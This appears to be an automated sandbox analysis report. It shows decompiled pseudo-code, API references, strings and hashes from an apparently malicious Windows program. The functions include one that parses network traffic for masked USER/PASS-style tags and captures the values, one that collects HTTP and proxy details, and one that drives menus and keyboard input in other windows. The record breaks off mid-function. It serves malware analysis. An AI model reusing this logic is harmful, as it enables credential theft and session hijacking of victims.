				char _v696;
				char _v700;
				signed char _v701;
				char _v708;
				signed char _v713;
				void* __edi;
				void* __esi;
				signed int _t48;
				short _t50;
				short _t51;
				signed int _t59;
				short _t60;
				signed int _t64;
				signed int _t66;
				void* _t67;
				void* _t81;
				signed char _t83;
				intOrPtr _t85;
				void* _t88;
				intOrPtr* _t94;
				signed int _t96;
				short _t97;
				intOrPtr _t98;
				void* _t104;
				void* _t105;
				intOrPtr _t108;
				short _t110;
				signed int* _t115;
				signed short* _t119;
				signed int* _t120;
				intOrPtr* _t121;

				_t108 = _a4;
				_t81 = __eax;
				if(_t108 == 0xffffffff) {
					L60:
					__eflags = 0;
					return 0;
				} else {
					_t115 = _a8;
					if(_t115 == 0 || __eax > 0x200) {
						goto L60;
					} else {
						if(__eax <= 6) {
							L22:
							__eflags = _t81 - 1;
							if(_t81 > 1) {
								EnterCriticalSection(0x42edc4);
								_t110 = E0041DE60(_t108);
								__eflags = _t110;
								if(_t110 != 0) {
									__eflags =  *((intOrPtr*)(_t110 + 4));
									if( *((intOrPtr*)(_t110 + 4)) == 0) {
										L58:
										E0041DF50(_t45, 0);
									} else {
										__eflags =  *((intOrPtr*)(_t110 + 8));
										if( *((intOrPtr*)(_t110 + 8)) == 0) {
											goto L58;
										} else {
											__eflags = _t81 - 3;
											if(_t81 < 3) {
												L31:
												__eflags = _t81 - 4;
												if(_t81 >= 4) {
													_t48 =  *_t115 ^ 0x02020000;
													__eflags = _t48 - 0x47525954;
													if(_t48 == 0x47525954) {
														goto L35;
													} else {
														__eflags = _t48 - 0x56434546;
														if(_t48 == 0x56434546) {
															goto L35;
														} else {
															__eflags = _t48 - 0x54514150;
															if(_t48 != 0x54514150) {
																__eflags = _t48 - 0x56435453;
																if(_t48 == 0x56435453) {
																	L38:
																	_t83 = 0x65;
																	_t88 = 0x15;
																	goto L39;
																} else {
																	__eflags = _t48 - 0x5651494c;
																	if(_t48 == 0x5651494c) {
																		goto L38;
																	}
																}
															} else {
																goto L35;
															}
														}
													}
												}
											} else {
												_t64 =  *_t115;
												__eflags = _t64 - 0x43;
												if(_t64 == 0x43) {
													L29:
													__eflags = _t115[0] - 0x57;
													if(_t115[0] != 0x57) {
														goto L31;
													} else {
														__eflags = _t115[0] - 0x44;
														if(_t115[0] == 0x44) {
															L35:
															_t83 = 0x64;
															_t88 = 0x14;
															L39:
															_v701 = _t83;
															E00424100(_t88,  &_v696);
															_t50 =  &_v700;
															_v700 = 0x80;
															__imp__#5(_a4,  &_v652, _t50);
															__eflags = _t50;
															if(_t50 == 0) {
																_t51 = E004153C0( &_v664);
																__eflags = _t51;
																if(_t51 == 0) {
																	__eflags = _t83 - 0x65;
																	if(_t83 == 0x65) {
																		L56:
																		E00415370( &_v664,  &_v536);
																		E00424100(0x13,  &_v696);
																		_push( &_v536);
																		_push( *((intOrPtr*)(_t110 + 8)));
																		_push( *((intOrPtr*)(_t110 + 4)));
																		E0040D910(__eflags, _t83 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																	} else {
																		__eflags = _t83 - 0x64;
																		if(_t83 == 0x64) {
																			_t119 =  &_v696;
																			E00424100(0x16, _t119);
																			_t94 =  *((intOrPtr*)(_t110 + 4));
																			__eflags = _t94;
																			if(_t94 == 0) {
																				goto L56;
																			} else {
																				_t59 = 0;
																				__eflags =  *_t94;
																				if( *_t94 == 0) {
																					L52:
																					_t60 = _t59 + 0xfffffff7;
																					__eflags = _t60;
																					if(_t60 != 0) {
																						goto L55;
																					}
																				} else {
																					do {
																						_t59 = _t59 + 1;
																						__eflags =  *((short*)(_t94 + _t59 * 2));
																					} while ( *((short*)(_t94 + _t59 * 2)) != 0);
																					__eflags = _t59 - 9;
																					if(_t59 != 9) {
																						goto L52;
																					} else {
																						_t104 = 0;
																						_t97 = _t94 -  &_v696;
																						__eflags = _t97;
																						while(1) {
																							_t60 = ( *(_t97 + _t119) & 0x0000ffff) - ( *_t119 & 0x0000ffff);
																							__eflags = _t60;
																							if(_t60 != 0) {
																								break;
																							}
																							_t104 = _t104 + 1;
																							_t119 =  &(_t119[1]);
																							__eflags = _t104 - 9;
																							if(_t104 < 9) {
																								continue;
																							} else {
																							}
																							goto L57;
																						}
																						_t83 = _v713;
																						L55:
																						__eflags = _t60;
																						_t96 = 0 | _t60 > 0x00000000;
																						_t35 = _t96 - 1; // -1
																						__eflags = _t96 + _t35;
																						if(_t96 + _t35 != 0) {
																							goto L56;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
															L57:
															_t45 = _t110;
															goto L58;
														} else {
															goto L31;
														}
													}
												} else {
													__eflags = _t64 - 0x50;
													if(_t64 != 0x50) {
														goto L31;
													} else {
														goto L29;
													}
												}
											}
										}
									}
								}
								LeaveCriticalSection(0x42edc4);
							}
							goto L60;
						} else {
							_t66 =  *_t115 ^ 0x02020000;
							if(_t66 == 0x50475355 || _t66 == 0x51514150) {
								if(_t115[1] != 0x20) {
									goto L22;
								} else {
									_t105 = _t81 - 5;
									_t120 =  &(_t115[1]);
									_t67 = 0;
									if(_t105 == 0) {
										goto L60;
									} else {
										while(1) {
											_t98 =  *((intOrPtr*)(_t67 + _t120));
											if(_t98 == 0xd || _t98 == 0xa) {
												break;
											}
											if(_t98 < 0x20) {
												goto L60;
											} else {
												_t67 = _t67 + 1;
												if(_t67 < _t105) {
													continue;
												} else {
													break;
												}
											}
											goto L61;
										}
										if(_t67 == 0 || _t67 == _t105) {
											goto L60;
										} else {
											_t85 = E00410AA0(_t120, 0xfde9, _t67);
											if(_t85 == 0) {
												goto L60;
											} else {
												_v701 = 0;
												EnterCriticalSection(0x42edc4);
												_t121 = E0041DE60(_t108);
												if(_t121 != 0) {
													L18:
													__eflags =  *_a8 - 0x55;
													_v701 = 1;
													if( *_a8 != 0x55) {
														E004107C0( *((intOrPtr*)(_t121 + 8)));
														 *((intOrPtr*)(_t121 + 8)) = _t85;
													} else {
														E0041DF50(_t121, 1);
														 *((intOrPtr*)(_t121 + 4)) = _t85;
													}
													 *_t121 = _t108;
													LeaveCriticalSection(0x42edc4);
													return _v701;
												} else {
													_t121 = E0041DEA0(_t108);
													if(_t121 != 0) {
														goto L18;
													} else {
														E004107C0(_t85);
														LeaveCriticalSection(0x42edc4);
														return _v701;
													}
												}
											}
										}
									}
								}
							} else {
								goto L22;
							}
						}
					}
				}
				L61:
			}

0x0041dfef
0x0041dff2
0x0041dff7
0x0041e2bf
0x0041e2c1
0x0041e2c7
0x0041dffd
0x0041dffd
0x0041e002
0x00000000
0x0041e014
0x0041e017
0x0041e11a
0x0041e11a
0x0041e11d
0x0041e128
0x0041e133
0x0041e135
0x0041e137
0x0041e13d
0x0041e141
0x0041e2ad
0x0041e2af
0x0041e147
0x0041e147
0x0041e14b
0x00000000
0x0041e151
0x0041e151
0x0041e154
0x0041e16c
0x0041e16c
0x0041e16f
0x0041e177
0x0041e17c
0x0041e181
0x00000000
0x0041e183
0x0041e183
0x0041e188
0x00000000
0x0041e18a
0x0041e18a
0x0041e18f
0x0041e19a
0x0041e19f
0x0041e1ac
0x0041e1ac
0x0041e1ae
0x00000000
0x0041e1a1
0x0041e1a1
0x0041e1a6
0x00000000
0x00000000
0x0041e1a6
0x00000000
0x00000000
0x00000000
0x0041e18f
0x0041e188
0x0041e181
0x0041e156
0x0041e156
0x0041e158
0x0041e15a
0x0041e160
0x0041e160
0x0041e164
0x00000000
0x0041e166
0x0041e166
0x0041e16a
0x0041e191
0x0041e191
0x0041e193
0x0041e1b3
0x0041e1b7
0x0041e1bb
0x0041e1c3
0x0041e1ce
0x0041e1d6
0x0041e1dc
0x0041e1de
0x0041e1e8
0x0041e1ed
0x0041e1ef
0x0041e1f5
0x0041e1f8
0x0041e265
0x0041e270
0x0041e27e
0x0041e290
0x0041e291
0x0041e292
0x0041e2a3
0x0041e1fa
0x0041e1fa
0x0041e1fd
0x0041e203
0x0041e20c
0x0041e211
0x0041e214
0x0041e216
0x00000000
0x0041e218
0x0041e218
0x0041e21a
0x0041e21d
0x0041e24b
0x0041e24b
0x0041e24b
0x0041e24e
0x00000000
0x0041e250
0x0041e220
0x0041e220
0x0041e220
0x0041e221
0x0041e221
0x0041e228
0x0041e22b
0x00000000
0x0041e22d
0x0041e231
0x0041e233
0x0041e233
0x0041e235
0x0041e23c
0x0041e23c
0x0041e23e
0x00000000
0x00000000
0x0041e240
0x0041e241
0x0041e244
0x0041e247
0x00000000
0x00000000
0x0041e249
0x00000000
0x0041e247
0x0041e252
0x0041e256
0x0041e258
0x0041e25a
0x0041e25d
0x0041e261
0x0041e263
0x00000000
0x00000000
0x0041e263
0x0041e22b
0x0041e21d
0x0041e216
0x0041e1fd
0x0041e1f8
0x0041e1ef
0x0041e2ab
0x0041e2ab
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e16a
0x0041e15c
0x0041e15c
0x0041e15e
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e15e
0x0041e15a
0x0041e154
0x0041e14b
0x0041e141
0x0041e2b9
0x0041e2b9
0x00000000
0x0041e01d
0x0041e01f
0x0041e029
0x0041e03a
0x00000000
0x0041e040
0x0041e040
0x0041e043
0x0041e046
0x0041e04a
0x00000000
0x0041e050
0x0041e050
0x0041e050
0x0041e056
0x00000000
0x00000000
0x0041e060
0x00000000
0x0041e066
0x0041e066
0x0041e069
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e069
0x00000000
0x0041e060
0x0041e06d
0x00000000
0x0041e07b
0x0041e086
0x0041e08a
0x00000000
0x0041e090
0x0041e095
0x0041e09a
0x0041e0a5
0x0041e0a9
0x0041e0d8
0x0041e0db
0x0041e0de
0x0041e0e3
0x0041e0f6
0x0041e0fb
0x0041e0e5
0x0041e0e9
0x0041e0ee
0x0041e0ee
0x0041e105
0x0041e107
0x0041e117
0x0041e0ab
0x0041e0b3
0x0041e0b7
0x00000000
0x0041e0b9
0x0041e0bb
0x0041e0c5
0x0041e0d5
0x0041e0d5
0x0041e0b7
0x0041e0a9
0x0041e08a
0x0041e06d
0x0041e04a
0x00000000
0x00000000
0x00000000
0x0041e029
0x0041e017
0x0041e002
0x00000000

APIs

EnterCriticalSection.KERNEL32(0042EDC4,0000FDE9,00000000), ref: 0041E09A
LeaveCriticalSection.KERNEL32(0042EDC4,?), ref: 0041E0C5
LeaveCriticalSection.KERNEL32(0042EDC4), ref: 0041E107

Part of subcall function 0041DF50: HeapFree.KERNEL32(?,00000000,?,00000000,?,0041E2B4,00000000), ref: 0041DF70
Part of subcall function 0041DF50: HeapFree.KERNEL32(?,00000000,?,00000000,?,0041E2B4,00000000), ref: 0041DF8A

EnterCriticalSection.KERNEL32(0042EDC4), ref: 0041E128
getpeername.WS2_32 ref: 0041E1D6
LeaveCriticalSection.KERNEL32(0042EDC4), ref: 0041E2B9

Strings

STCV, xrefs: 0041E19A
USGP, xrefs: 0041E024
LIQV, xrefs: 0041E1A1
PAQQ, xrefs: 0041E02B
FECV, xrefs: 0041E183
PAQT, xrefs: 0041E18A
TYRG, xrefs: 0041E17C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterFreeHeap$getpeername
String ID: FECV$LIQV$PAQQ$PAQT$STCV$TYRG$USGP
API String ID: 4104136926-2432391943
Opcode ID: f8f77f2734e122a3e2ab1d3d4739160017604c2035acbf7cfad3455cc20ded3d
Instruction ID: 3279819f0b30b65da2df542c74215665110b0bcb0be343f9717d662c2d23d26e
Opcode Fuzzy Hash: f8f77f2734e122a3e2ab1d3d4739160017604c2035acbf7cfad3455cc20ded3d
Instruction Fuzzy Hash: FC7177396003519AEB309A27CC94BEB7B95AF96300F14496FEC859B391C67DCCC1838E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B920, Relevance: 22.7, APIs: 15, Instructions: 209
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B920(intOrPtr* __edi, void* _a4) {
				void _v12;
				long _v32;
				void _v48;
				void _v52;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* __ebx;
				void* __esi;
				void* _t31;
				int _t33;
				char _t38;
				void* _t39;
				void* _t44;
				long _t48;
				void _t55;
				long _t58;
				long _t65;
				void* _t72;
				void* _t73;
				void* _t75;
				intOrPtr _t82;
				intOrPtr _t83;
				char* _t87;
				DWORD* _t88;
				DWORD* _t89;
				DWORD* _t90;
				void* _t92;

				_t87 = __edi;
				_t92 = _a4;
				E00410870(_t31, __edi, 0, 0x48);
				_t88 = __edi + 0xc;
				 *((intOrPtr*)(__edi)) = 1;
				 *(__edi + 4) = _t92;
				 *_t88 = 0;
				_t33 = InternetQueryOptionA(_t92, 0x22, 0, _t88);
				if(_t33 != 0 ||  *_t88 <= _t33 || GetLastError() != 0x7a) {
					L7:
					_t72 = 0;
				} else {
					_t65 =  *_t88;
					if(_t65 == 0) {
						goto L7;
					} else {
						_t72 = HeapAlloc( *0x42e6d4, 8, _t65 + 4);
						if(_t72 == 0) {
							goto L7;
						} else {
							if(InternetQueryOptionA(_t92, 0x22, _t72, _t88) != 1) {
								E004107C0(_t72);
								goto L7;
							}
						}
					}
				}
				 *(_t87 + 8) = _t72;
				if(_t72 != 0) {
					_t89 = _t87 + 0x14;
					 *_t89 = 0;
					if(HttpQueryInfoA(_t92, 0x80000023,  &_v12, _t89, 0) != 0 || GetLastError() != 0x7a) {
						L16:
						_t73 = 0;
					} else {
						_t58 =  *_t89;
						if(_t58 == 0) {
							goto L16;
						} else {
							_t73 = HeapAlloc( *0x42e6d4, 8, _t58 + 4);
							if(_t73 == 0) {
								goto L16;
							} else {
								if(HttpQueryInfoA(_t92, 0x80000023, _t73, _t89, 0) != 1) {
									E004107C0(_t73);
									goto L16;
								}
							}
						}
					}
					 *(_t87 + 0x10) = _t73;
					_v32 = 9;
					if(HttpQueryInfoA(_t92, 0x2d,  &_v48,  &_v32, 0) != 1) {
						L25:
						_t90 = _t87 + 0x20;
						 *_t90 = 0;
						if(HttpQueryInfoA(_t92, 0x80000001,  &_v52, _t90, 0) != 0 || GetLastError() != 0x7a) {
							L31:
							_t75 = 0;
						} else {
							_t48 =  *_t90;
							if(_t48 == 0) {
								goto L31;
							} else {
								_t75 = HeapAlloc( *0x42e6d4, 8, _t48 + 4);
								if(_t75 == 0) {
									goto L31;
								} else {
									if(HttpQueryInfoA(_t92, 0x80000001, _t75, _t90, 0) != 1) {
										E004107C0(_t75);
										goto L31;
									}
								}
							}
						}
						_t38 = _v64;
						 *(_t87 + 0x1c) = _t75;
						if(_t38 - 1 <= 0xfffff) {
							_t82 = _v68;
							if(_t82 != 0) {
								 *((intOrPtr*)(_t87 + 0x24)) = _t82;
								 *((intOrPtr*)(_t87 + 0x28)) = _t38;
							}
						}
						_t39 = E00413740(0x1c,  &_v64, _t92);
						_v76 = _t39;
						if(_t39 != 0) {
							if( *_t39 == 0) {
								L42:
								HeapFree( *0x42e6d4, 0, _t39);
							} else {
								_t44 = E00413740(0x1d,  &_v64, _t92);
								if(_t44 == 0) {
									L41:
									_t39 = _v72;
									goto L42;
								} else {
									if( *_t44 == 0) {
										HeapFree( *0x42e6d4, 0, _t44);
										goto L41;
									} else {
										 *(_t87 + 0x2c) = _v72;
										 *(_t87 + 0x30) = _t44;
									}
								}
							}
						}
						 *((intOrPtr*)(_t87 + 0x40)) = E00423A90();
						 *((intOrPtr*)(_t87 + 0x44)) = E0040C250();
						return 1;
					} else {
						_t55 = _v52;
						if(_t55 <= 1) {
							goto L25;
						} else {
							_t83 = _v68;
							if(_t83 != 0x50) {
								if(_t83 != 0x47 || _t55 != 3) {
									goto L9;
								} else {
									 *((char*)(_t87 + 0x18)) = 0;
									goto L25;
								}
							} else {
								if(_t55 != 4) {
									goto L9;
								} else {
									 *((char*)(_t87 + 0x18)) = 1;
									goto L25;
								}
							}
						}
					}
				} else {
					L9:
					return 0;
				}
			}

0x0040b920
0x0040b925
0x0040b92f
0x0040b934
0x0040b93c
0x0040b942
0x0040b946
0x0040b94c
0x0040b954
0x0040b99a
0x0040b99a
0x0040b965
0x0040b965
0x0040b969
0x00000000
0x0040b96b
0x0040b97d
0x0040b981
0x00000000
0x0040b983
0x0040b991
0x0040b995
0x00000000
0x0040b995
0x0040b991
0x0040b981
0x0040b969
0x0040b99c
0x0040b9a1
0x0040b9b0
0x0040b9bf
0x0040b9cd
0x0040ba15
0x0040ba15
0x0040b9da
0x0040b9da
0x0040b9de
0x00000000
0x0040b9e0
0x0040b9f3
0x0040b9f7
0x00000000
0x0040b9f9
0x0040ba0c
0x0040ba10
0x00000000
0x0040ba10
0x0040ba0c
0x0040b9f7
0x0040b9de
0x0040ba25
0x0040ba2f
0x0040ba3c
0x0040ba75
0x0040ba77
0x0040ba86
0x0040ba90
0x0040bad7
0x0040bad7
0x0040ba9d
0x0040ba9d
0x0040baa1
0x00000000
0x0040baa3
0x0040bab5
0x0040bab9
0x00000000
0x0040babb
0x0040bace
0x0040bad2
0x00000000
0x0040bad2
0x0040bace
0x0040bab9
0x0040baa1
0x0040bad9
0x0040bae0
0x0040bae9
0x0040baeb
0x0040baf1
0x0040baf3
0x0040baf6
0x0040baf6
0x0040baf1
0x0040bb03
0x0040bb08
0x0040bb0e
0x0040bb14
0x0040bb4a
0x0040bb54
0x0040bb16
0x0040bb1c
0x0040bb23
0x0040bb46
0x0040bb46
0x00000000
0x0040bb25
0x0040bb29
0x0040bb40
0x00000000
0x0040bb2b
0x0040bb2f
0x0040bb32
0x0040bb32
0x0040bb29
0x0040bb23
0x0040bb14
0x0040bb5f
0x0040bb69
0x0040bb72
0x0040ba3e
0x0040ba3e
0x0040ba45
0x00000000
0x0040ba47
0x0040ba47
0x0040ba4e
0x0040ba62
0x00000000
0x0040ba71
0x0040ba71
0x00000000
0x0040ba71
0x0040ba50
0x0040ba53
0x00000000
0x0040ba59
0x0040ba59
0x00000000
0x0040ba59
0x0040ba53
0x0040ba4e
0x0040ba45
0x0040b9a5
0x0040b9a5
0x0040b9ab
0x0040b9ab

APIs

InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040B94C
GetLastError.KERNEL32 ref: 0040B95A
HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0040B977
InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040B988

Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD

HttpQueryInfoA.WININET(?,80000023,?,?,00000000), ref: 0040B9C5
GetLastError.KERNEL32 ref: 0040B9CF
HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0040B9ED
HttpQueryInfoA.WININET(?,80000023,00000000,?,00000000), ref: 0040BA03
HttpQueryInfoA.WININET ref: 0040BA37
HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040BA8C
GetLastError.KERNEL32 ref: 0040BA92
HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0040BAAF
HttpQueryInfoA.WININET(?,80000001,00000000,?,00000000), ref: 0040BAC5
HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 0040BB40
HeapFree.KERNEL32(?,00000000,00000000,?), ref: 0040BB54

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Query$Heap$HttpInfo$AllocErrorFreeLast$InternetOption
String ID:
API String ID: 1236818155-0
Opcode ID: 8ea8a25ecf8a2ec7e121124140c5a7a401ef8cb20629d75bcd122bb7ddab85b8
Instruction ID: bdc738c9fde4204af2ee63a823107a008bd6c73fae90c637e61984cbeeec0d20
Opcode Fuzzy Hash: 8ea8a25ecf8a2ec7e121124140c5a7a401ef8cb20629d75bcd122bb7ddab85b8
Instruction Fuzzy Hash: F2617C70600302ABE7209FA5DD84B67B7A8EB54704F50443AFA45F66D0DB78E944CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00426A90, Relevance: 22.6, APIs: 15, Instructions: 145
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00426A90(struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				int _v24;
				signed short _t29;
				int _t40;
				BYTE* _t41;
				signed int _t46;
				signed short _t47;
				signed int _t56;
				int _t58;
				struct HWND__* _t59;
				struct HMENU__* _t60;
				signed short _t61;
				int _t74;
				int _t75;
				struct HMENU__* _t78;
				struct HWND__* _t79;
				void* _t83;

				_t29 = _a8;
				_push(_t56);
				_t83 = _t29 - 0xfffffffd;
				if(_t83 == 0) {
					SetKeyboardState( *0x42eeb0);
					L24:
					SetEvent( *0x42eeac);
					return 0;
				}
				if(_t83 <= 0 || _t29 > 0xffffffff) {
					_v20.top = _t29 >> 0x10;
					_v20.bottom = _t61 >> 0x10;
					_v20.right = _t61 & 0x0000ffff;
					_v20.left = _t29 & 0x0000ffff;
					E0041B6E0( &_v20, __eflags, 0x42eea0, _a4, 0);
					goto L24;
				} else {
					_t78 = GetMenu(_a4);
					if(_t78 == 0) {
						goto L24;
					}
					_t58 = _t56 | 0xffffffff;
					_t40 = GetMenuItemCount(_t78);
					_t74 = 0;
					_v24 = _t40;
					if(_t40 <= 0) {
						L9:
						_t41 =  *0x42eeb0;
						_push(_t41[0x104]);
						_t75 = MenuItemFromPoint(_a4, _t78, _t41[0x100]);
						if(_t75 == 0xffffffff) {
							goto L24;
						}
						_v24 = GetMenuState(_t78, _t75, 0x400);
						if(_t58 != _t75) {
							EndMenu();
						}
						_t59 = _a4;
						HiliteMenuItem(_t59, _t78, _t75, 0x480);
						if(_a8 != 0xfffffffe) {
							_t46 = _v24;
							if((_t46 & 0x00000003) != 0) {
								goto L24;
							}
							if((_t46 & 0x00000010) == 0) {
								__eflags = _t46 & 0x00000800;
								if((_t46 & 0x00000800) == 0) {
									_t47 = GetMenuItemID(_t78, _t75);
									__eflags = _t47 - 0xffffffff;
									if(_t47 == 0xffffffff) {
										goto L24;
									}
									L21:
									SendMessageW(_t59, 0x111, _t47 & 0x0000ffff, 0);
									goto L24;
								}
								_t47 = 0;
								goto L21;
							}
							_t60 = GetSubMenu(_t78, _t75);
							if(_t60 != 0) {
								_t79 = _a4;
								if(GetMenuItemRect(_t79, _t78, _t75,  &_v20) != 0) {
									TrackPopupMenuEx(_t60, 0x4000, _v20, _v20.bottom, _t79, 0);
								}
							}
						}
						goto L24;
					} else {
						do {
							if(GetMenuState(_t78, _t74, 0x400) < 0) {
								HiliteMenuItem(_a4, _t78, _t74, 0x400);
								_t58 = _t74;
							}
							_t74 = _t74 + 1;
						} while (_t74 < _v24);
						goto L9;
					}
				}
			}

0x00426a96
0x00426a9c
0x00426a9f
0x00426aa2
0x00426c25
0x00426c2b
0x00426c31
0x00426c3f
0x00426c3f
0x00426aa8
0x00426bf2
0x00426bfc
0x00426c06
0x00426c13
0x00426c17
0x00000000
0x00426ab7
0x00426ac1
0x00426ac5
0x00000000
0x00000000
0x00426acc
0x00426acf
0x00426ad5
0x00426ad7
0x00426add
0x00426b0b
0x00426b0b
0x00426b1f
0x00426b29
0x00426b2e
0x00000000
0x00000000
0x00426b41
0x00426b47
0x00426b49
0x00426b49
0x00426b4f
0x00426b5a
0x00426b64
0x00426b6a
0x00426b70
0x00000000
0x00000000
0x00426b78
0x00426bc0
0x00426bc5
0x00426bcd
0x00426bd3
0x00426bd6
0x00000000
0x00000000
0x00426bd8
0x00426be4
0x00000000
0x00426be4
0x00426bc7
0x00000000
0x00426bc7
0x00426b82
0x00426b86
0x00426b93
0x00426b9f
0x00426bb8
0x00426bb8
0x00426b9f
0x00426b86
0x00000000
0x00426ae0
0x00426ae0
0x00426aef
0x00426afc
0x00426b02
0x00426b02
0x00426b04
0x00426b05
0x00000000
0x00426ae0
0x00426add

APIs

GetMenu.USER32(?), ref: 00426ABB
GetMenuItemCount.USER32 ref: 00426ACF
GetMenuState.USER32 ref: 00426AE7
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00426AFC
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 00426B23
GetMenuState.USER32 ref: 00426B3B
EndMenu.USER32 ref: 00426B49
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 00426B5A
GetSubMenu.USER32 ref: 00426B7C
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 00426B97
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 00426BB8
GetMenuItemID.USER32(00000000,00000000), ref: 00426BCD
SendMessageW.USER32(?,00000111,?,00000000), ref: 00426BE4
SetKeyboardState.USER32(?), ref: 00426C25
SetEvent.KERNEL32(?), ref: 00426C31

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: 0095f85532610d6f0709270e8290b88663ce7f3bca220dc5e822ad311b4ef535
Instruction ID: 701b790957232c86f41415b2f2d80616bab8e2b93198e32930c083f84b82f57e
Opcode Fuzzy Hash: 0095f85532610d6f0709270e8290b88663ce7f3bca220dc5e822ad311b4ef535
Instruction Fuzzy Hash: 64419874200321AFD310AF36AD88EAB7BA8EB85755F414A1AFD55D72E0C774D801CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004278B0, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 338
synchronizationwindowthreadCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004278B0(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				intOrPtr _v40;
				struct tagWINDOWINFO _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed char _v80;
				long _v84;
				signed short _v88;
				intOrPtr _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t143;
				struct HWND__* _t145;
				signed int _t147;
				signed int _t149;
				signed int _t151;
				signed short _t156;
				void* _t160;
				void* _t163;
				void* _t166;
				signed int _t172;
				struct HWND__* _t173;
				signed short _t174;
				signed short _t176;
				signed short _t178;
				intOrPtr _t182;
				signed char _t190;
				signed int _t194;
				long _t199;
				signed short _t222;
				signed int _t225;
				signed short _t245;
				struct HWND__* _t251;
				struct HWND__* _t252;
				void* _t254;
				intOrPtr _t256;

				_t254 = __eax;
				_t143 =  *((intOrPtr*)(__eax + 0x10));
				_t225 = 0;
				_v84 = 0;
				if( *((intOrPtr*)(_t143 + 0x110)) == 0) {
					_t199 =  *((intOrPtr*)(_t143 + 0x108));
					_v84 = _t199;
					if(_t199 == 0) {
						L18:
						_t190 = _a4;
						_v80 = _t225;
						goto L19;
					}
					_t222 = 0;
					if(( *(_t143 + 1) & 0x00000080) != 0) {
						_t222 = 1;
					}
					if(( *(_t143 + 2) & 0x00000080) != 0) {
						_t222 = _t222 | 0x00000002;
					}
					if(( *(_t143 + 4) & 0x00000080) != 0) {
						_t222 = _t222 | 0x00000010;
					}
					if(( *(_t143 + 0x10) & 0x00000080) != 0) {
						_t222 = _t222 | 0x00000004;
					}
					if(( *(_t143 + 0x11) & 0x00000080) != 0) {
						_t222 = _t222 | 0x00000008;
					}
					_t225 = _t222 & 0x0000ffff;
					goto L18;
				} else {
					_t190 = _a4;
					if((_t190 & 0x00000001) != 0) {
						E00427350(_a12, _a8, __eax);
						_t190 = _t190 & 0xfffffffe;
						_a4 = _t190;
					}
					if((_t190 & 0x00000004) != 0) {
						WaitForSingleObject( *(_t254 + 0x14), 0xffffffff);
						_t182 =  *((intOrPtr*)(_t254 + 0x10));
						_t252 =  *(_t182 + 0x108);
						 *((intOrPtr*)(_t182 + 0x10c)) = 0;
						 *((intOrPtr*)( *((intOrPtr*)(_t254 + 0x10)) + 0x108)) = 0;
						 *((short*)( *((intOrPtr*)(_t254 + 0x10)) + 0x110)) = 0;
						ReleaseMutex( *(_t254 + 0x14));
						if(IsWindow(_t252) != 0) {
							PostMessageW(_t252, 0x215, 0, 0);
						}
					}
					L19:
					 *( *((intOrPtr*)(_t254 + 0x10)) + 0x100) = _a8;
					_t145 = _a12;
					 *( *((intOrPtr*)(_t254 + 0x10)) + 0x104) = _t145;
					if(_t190 == 0) {
						L89:
						return _t145;
					}
					_t147 = _t190 & 0x00000002;
					_v76 = _t147;
					if(_t147 == 0) {
						if((_t190 & 0x00000004) == 0) {
							L25:
							_t149 = _t190 & 0x00000020;
							_v72 = _t149;
							if(_t149 == 0) {
								if((_t190 & 0x00000040) == 0) {
									L30:
									_t151 = _t190 & 0x00000008;
									_v68 = _t151;
									if(_t151 == 0) {
										if((_t190 & 0x00000010) == 0) {
											L35:
											_t251 = E00416F00(0x64,  &_v88,  *( *((intOrPtr*)(_t254 + 0x10)) + 0x100),  *( *((intOrPtr*)(_t254 + 0x10)) + 0x104));
											if(_v96 + 0xfffffff6 <= 7) {
												_t172 = GetWindowLongW(_t251, 0xfffffff0);
												if((_t172 & 0x40000000) != 0 && (_t172 & 0x00c00000) != 0xc00000 && (_t172 & 0x80040000) == 0) {
